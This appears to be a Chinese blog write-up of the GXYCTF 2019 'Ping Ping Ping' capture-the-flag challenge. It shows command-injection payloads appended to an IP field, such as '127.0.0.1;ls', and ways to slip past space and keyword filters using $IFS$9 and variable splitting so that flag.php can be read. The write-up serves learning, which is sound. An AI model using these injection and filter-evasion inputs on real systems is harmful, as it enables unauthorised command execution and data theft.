[GXYCTF 2019]Ping Ping Ping

image-20220630142735766

题目就是ping,而且这还有一个查询窗口,就随便查询试试

image-20220630143123749

ping了一下本地,发现没有什么很大的作用,给出了提示是php可以执行系统函数这就感到神奇了,就还是上网搜了搜
发现可以在查询IP后面进行拼接命令

image-20220630143530705

那么就先查看一下根目录127.0.0.1;ls

image-20220630143618036

发现根目录下有两个文件,其中就有flag.php
那么直接127.0.0.1;cat flag.php

image-20220630143939520

发现报错,过滤了空格,就用, $IFS$9 {IFS}等方式绕过

image-20220630144330303

但flag直接被过滤了,这就不知道怎么搞了,还是去搜了wp
可以通过变量拼接的方式,使flag分成两段来绕过

127.0.0.1;a=ag;b=fl;cat$IFS$9$b$a.php

image-20220630145037692

似乎还是没有看到flag,但在F12里面仔细找找就会发现

image-20220630145217219

posted @   traveller-2333  阅读(206)  评论(0编辑  收藏  举报
相关博文:
阅读排行:
· 阿里最新开源QwQ-32B,效果媲美deepseek-r1满血版,部署成本又又又降低了!
· 开源Multi-agent AI智能体框架aevatar.ai,欢迎大家贡献代码
· Manus重磅发布:全球首款通用AI代理技术深度解析与实战指南
· 被坑几百块钱后,我竟然真的恢复了删除的微信聊天记录!
· AI技术革命,工作效率10个最佳AI工具
点击右上角即可分享
微信分享提示